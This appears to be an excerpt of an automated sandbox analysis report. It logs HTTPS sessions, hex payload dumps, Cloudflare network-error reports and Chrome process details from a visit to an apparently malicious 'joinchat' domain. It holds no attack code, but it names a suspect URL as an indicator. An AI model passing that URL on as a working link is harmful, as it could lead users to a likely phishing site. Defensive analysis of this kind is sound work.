                          2024-05-27 22:30:20 UTC1369INData Raw: fd b5 97 52 e7 fc fd 23 14 51 2b 5b 2a 54 59 70 62 55 37 f6 8a 16 bd ab e5 28 f2 fb c2 55 11 09 13 12 57 c5 de be 92 51 ad 6c 71 c0 01 5f d9 06 5c 45 c7 ee 25 f7 53 68 bf d2 d6 42 2e eb 7a 73 14 3a c7 1e 28 57 84 df 9f 78 cd fa 96 a2 1d 0d 06 2a fb bb 9a 6a d5 77 c1 15 fb 98 d5 aa 75 fb ca 91 4e c4 8b 2a 67 a5 ab 1e f4 f7 50 b2 56 fb eb 47 77 76 6d de a5 f5 53 57 24 da 60 07 be ac 07 41 9d 72 5e e7 e7 e5 db a5 bc 99 8a dc 92 f8 ae be ec 76 1d e5 e8 d1 16 1c ec a2 47 b0 06 fb 3d c0 5c 6b ed 10 52 7b e3 80 05 73 47 f4 f6 06 87 aa ed 90 5e 16 66 b9 03 c3 b2 75 9c 6a 3b 14 54 3a 01 7d 55 3a ef 6d 3a 83 8a 07 7a 55 1f 29 57 32 3b 94 45 ea 8c bf 5b b1 82 7a e5 dc 30 a4 eb d5 54 5b 5a ee 49 87 5e 81 8e aa 53 a8 2d 88 72 c1 6a 27 3a 57 21 b5 43 07 2b d1 63 2a e5
                          Data Ascii: R#Q+[*TYpbU7(UWQlq_\E%ShB.zs:(Wx*jwuN*gPVGwvmSW$`Ar^vG=\kR{sG^fuj;T:}U:m:zU)W2;E[z0T[ZI^S-rj':W!C+c*
                          2024-05-27 22:30:20 UTC1369INData Raw: 49 a6 d3 8b ad ce 20 32 9d 29 77 91 70 a5 68 4c c5 ea 76 25 74 d1 31 de 3e be 19 b1 de 30 31 3d 4c ec 3c 13 5c 08 67 11 27 7a 47 da e8 c8 a1 1d ae a7 1e 90 f1 8c 9a ed 5a 6c 17 6c 10 43 03 03 48 c6 b1 b0 34 e3 98 09 d7 b2 4b e3 24 89 5d 96 4e 5a 19 9c 59 01 3b 49 72 42 4d 06 f2 b1 7b b8 94 4e af 5d ba 7e f3 de fd 75 0b e0 0e b4 01 db 43 20 b9 61 99 ef ac 2c a4 7f e9 5e 00 f9 29 3a 94 c3 f1 58 eb b4 82 fb 95 0b 09 cd cf 11 67 2f 3b d6 37 84 a1 9c 58 40 8c ed ab 8f b3 b7 2b ce ae f0 59 47 ce 9e b1 cf 1d 8a 13 ae 55 7b ea 26 51 2e 68 72 cf a6 0a c7 de f9 be 58 c0 3c b6 cc f7 d8 69 af 72 2b cb 4a 34 34 9b e4 b5 ce 96 b8 8f 23 9f 72 94 c1 0b 61 3c b9 76 f1 c2 95 5b 77 6f af 8f 7c 61 30 2e 21 8e fc 3c e4 41 77 69 69 09 ff 63 99 76 ff 97 d4 aa 92 c4 3c 1c 41 13
                          Data Ascii: I 2)wphLv%t1>01=L<\g'zGZllCH4K$]NZY;IrBM{N]~uC a,^):Xg/;7X@+YGU{&Q.hrX<ir+J44#ra<v[wo|a0.!<Awiicv<A
                          2024-05-27 22:30:20 UTC1369INData Raw: fb e4 16 c8 89 c7 47 e6 05 c2 4b 1b 22 ee 13 d3 27 a0 f0 1b bd f3 b2 96 d8 17 38 97 d8 97 78 37 7e 3b 81 7d ea f6 9d 9b a8 c6 47 96 bd e2 80 38 11 d0 d5 06 93 60 75 cb 32 8a e4 8e 09 6b 75 64 15 64 6e 34 e6 3e 88 1e 39 32 52 09 71 fc 91 77 fe ec 98 ef 01 31 4f b1 da 4e 03 cf 5f ff 60 6f 15 5b 8e 8f c2 5b 15 6b 8f c4 ea 04 c4 27 7b 0b ff 81 32 1b 18 97 a1 7a f5 f2 8d bb c6 27 27 90 eb d4 97 79 e1 8b 97 6c 37 3c 17 e3 1a d6 d6 07 bd 78 5a ff 13 4b f3 40 ef 52 7c 09 dd 79 06 fb c8 c4 c4 90 64 76 b8 8a d1 db f7 ae 5c 68 56 a5 2d 9e 64 ee 50 92 f8 6f 52 94 73 f3 bc 2b 13 ff bd b6 3b de c8 dd 21 05 fe 2e d4 e4 9e b8 2a 25 00 00 20 00 49 44 41 54 80 d4 83 fa fe 4c 98 ed af ef ef d2 fa 90 6d 66 7b db 0f 3b 92 89 8d 74 03 d5 24 b1 db 94 f9 6e d1 4f e2 b7 2c a5 f1
                          Data Ascii: GK"'8x7~;}G8`u2kuddn4>92Rqw1ON_`o[[k'{2z''yl7<xZK@R|ydv\hV-dPoRs+;!.*% IDATLmf{;t$nO,
                          2024-05-27 22:30:20 UTC1369INData Raw: 04 fc a3 5c bd ca 5c 86 d7 17 46 b5 09 ff f5 fa 9d 2b d7 2a 1b c6 fa 56 f5 0d 75 37 ce f6 2e 44 d4 5f d2 11 f5 80 a8 a7 c0 3d 3f f8 4b bb 80 3c 3c a3 72 f5 f2 9d f5 2f c8 33 d7 79 31 0e cc db a0 5c 02 bd b5 07 be ee 62 9d e1 bd be 64 43 7e 49 40 7f dd 5d 22 f0 6f 87 dd f3 f2 e6 e6 7c 2e 7b 16 ea 24 cc 2d 18 a8 8f dc bf 71 a1 f9 c4 04 46 0e 60 9a dc ab 01 e9 4f 03 ce 5f 49 71 fe ee de a8 23 33 bc fe 88 81 1e 29 cf 7c f4 5b 27 64 6e b3 79 69 1e 23 6a 34 bf cb 74 de 30 72 9f 7d 2e fd 6e 83 d8 75 c9 de 3e 46 27 d8 af 0b 88 af eb e5 f4 f5 44 9b 30 1e 85 da 73 8c 8e 3c 87 7d 62 68 42 8c 73 a3 e0 fa e5 a4 1c 6d 01 25 3f fc 23 ad ec 26 a4 bf 18 72 67 9e 6c 9c e3 98 d4 37 f6 3f 21 6e df b5 d4 33 cf 21 f3 21 8d 72 cb 2b cf 9b 2a a2 83 98 d8 92 36 cb 97 24 7b af db
                          Data Ascii: \\F+*Vu7.D_=?K<<r/3y1\bdC~I@]"o|.{$-qF`O_Iq#3)|['dnyi#j4t0r}.nu>F'D0s<}bhBsm%?#&rgl7?!n3!!r+*6${
                          2024-05-27 22:30:20 UTC1369INData Raw: ae d7 71 6f 83 f9 7a 2c bc 82 ba 76 07 e2 e8 da f5 fb 5f a4 38 3f a7 8d f6 29 5d 86 5a fc e6 69 bb e9 5c 3d 68 b7 53 5b 88 cf 15 2e e1 3f 70 bb fc b0 44 d2 3a 40 16 04 f6 75 04 33 ba e7 e4 8d 73 c2 2c ac c7 c3 69 a9 5e a6 d4 30 bc d7 db 4d 25 39 d7 c9 54 92 3c da 05 91 8e b2 dc 17 29 d2 bf 2d dd b1 65 b9 7a 6e 54 5c 3f e2 f6 21 91 ba df 90 e3 ae 5d 5a 6a 0a e9 7f d6 48 0f a9 33 bf 34 9f c3 2f ab 41 76 fb 21 2b 70 56 77 0c 3f 8d 71 13 49 ab 3b ce 7b 9d 17 d6 eb 6e c0 ad 2e db 5b 5d f8 f3 7a 55 e5 ea 8d 94 cd 19 e6 2b 16 cc 47 da c1 bc 94 0b 73 77 4a d7 75 7c 73 82 dd 80 3f 60 e6 a5 13 3a f2 bd 04 b8 d6 1f 2c 67 9e 77 51 47 39 61 a7 b9 b3 32 87 87 e3 d5 26 68 27 9d fc 69 7b 06 ba dc 09 e1 4b 59 a8 8f d8 c1 36 be 55 00 f5 45 05 f5 af bf 5d b9 73 59 41 dd 98
                          Data Ascii: qoz,v_8?)]Zi\=hS[.?pD:@u3s,i^0M%9T<)-eznT\?!]ZjH34/Av!+pVw?qI;{n.[]zU+GswJu|s?`:,gwQG9a2&h'i{KY6UE]sYA


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.46383835.190.80.14435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:31:16 UTC564OUTOPTIONS /report/v4?s=c6RIc6ACdz56YDTQYa5xnbXhr9YhF6DxZf3AhdLSysB4jl5fj%2Bnfoy3ilwZDPm4J8c3zapAM0wZUUiHjRn0eSF1g4t8Kiui7%2FOXI83DChGjxdJh%2BZlYB4mgfDWuddcZTPndrniYnq1BCAxjddQg%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://joinchat8g7135b.12trm.my.id
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:31:16 UTC336INHTTP/1.1 200 OK
                          content-length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: OPTIONS, POST
                          access-control-allow-origin: *
                          access-control-allow-headers: content-length, content-type
                          date: Mon, 27 May 2024 22:31:16 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.46383935.190.80.14435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:31:16 UTC537OUTOPTIONS /report/v4?s=FstcbIjvSOp3VY5prUsSWydzdqZtuNYgA1wPIZrG7SdC61HAWu2sN4HpuEAOmYmMB2aRThIcTki8DER510lRMnfSsT8e4OdISuHhXZCkJhZpuuJB5a1EyBTIzRaUDGyOOJxlXpw%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://rawcdn.githack.com
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:31:16 UTC336INHTTP/1.1 200 OK
                          content-length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: OPTIONS, POST
                          access-control-allow-origin: *
                          access-control-allow-headers: content-length, content-type
                          date: Mon, 27 May 2024 22:31:16 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.46384035.190.80.14435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:31:17 UTC494OUTPOST /report/v4?s=c6RIc6ACdz56YDTQYa5xnbXhr9YhF6DxZf3AhdLSysB4jl5fj%2Bnfoy3ilwZDPm4J8c3zapAM0wZUUiHjRn0eSF1g4t8Kiui7%2FOXI83DChGjxdJh%2BZlYB4mgfDWuddcZTPndrniYnq1BCAxjddQg%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 948
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:31:17 UTC948OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 36 33 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 39 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 6f 69 6e 63 68 61 74 38 67 37 31 33 35 62 2e 31 32 74 72 6d 2e 6d 79 2e 69 64 2f 76 68 73 66 68 71 70 64 68 64 73 69 68 36 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22
                          Data Ascii: [{"age":59633,"body":{"elapsed_time":696,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":200,"type":"abandoned"},"
                          2024-05-27 22:31:17 UTC168INHTTP/1.1 200 OK
                          content-length: 0
                          date: Mon, 27 May 2024 22:31:17 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.46384135.190.80.14435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:31:17 UTC476OUTPOST /report/v4?s=FstcbIjvSOp3VY5prUsSWydzdqZtuNYgA1wPIZrG7SdC61HAWu2sN4HpuEAOmYmMB2aRThIcTki8DER510lRMnfSsT8e4OdISuHhXZCkJhZpuuJB5a1EyBTIzRaUDGyOOJxlXpw%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 504
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:31:17 UTC504OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 39 35 37 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 35 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 6f 69 6e 63 68 61 74 38 67 37 31 33 35 62 2e 31 32 74 72 6d 2e 6d 79 2e 69 64 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 33 34 2e 32 33 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f
                          Data Ascii: [{"age":59576,"body":{"elapsed_time":750,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://joinchat8g7135b.12trm.my.id/","sampling_fraction":1.0,"server_ip":"104.21.234.230","status_code":404,"type":"http.error"},"type":"netwo
                          2024-05-27 22:31:17 UTC168INHTTP/1.1 200 OK
                          content-length: 0
                          date: Mon, 27 May 2024 22:31:17 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Click to jump to process

                          Click to jump to process

                          Click to jump to process

                          Target ID:0
                          Start time:18:30:06
                          Start date:27/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:1
                          Start time:18:30:08
                          Start date:27/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,6664779081059254972,7231676484794704864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:3
                          Start time:18:30:11
                          Start date:27/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly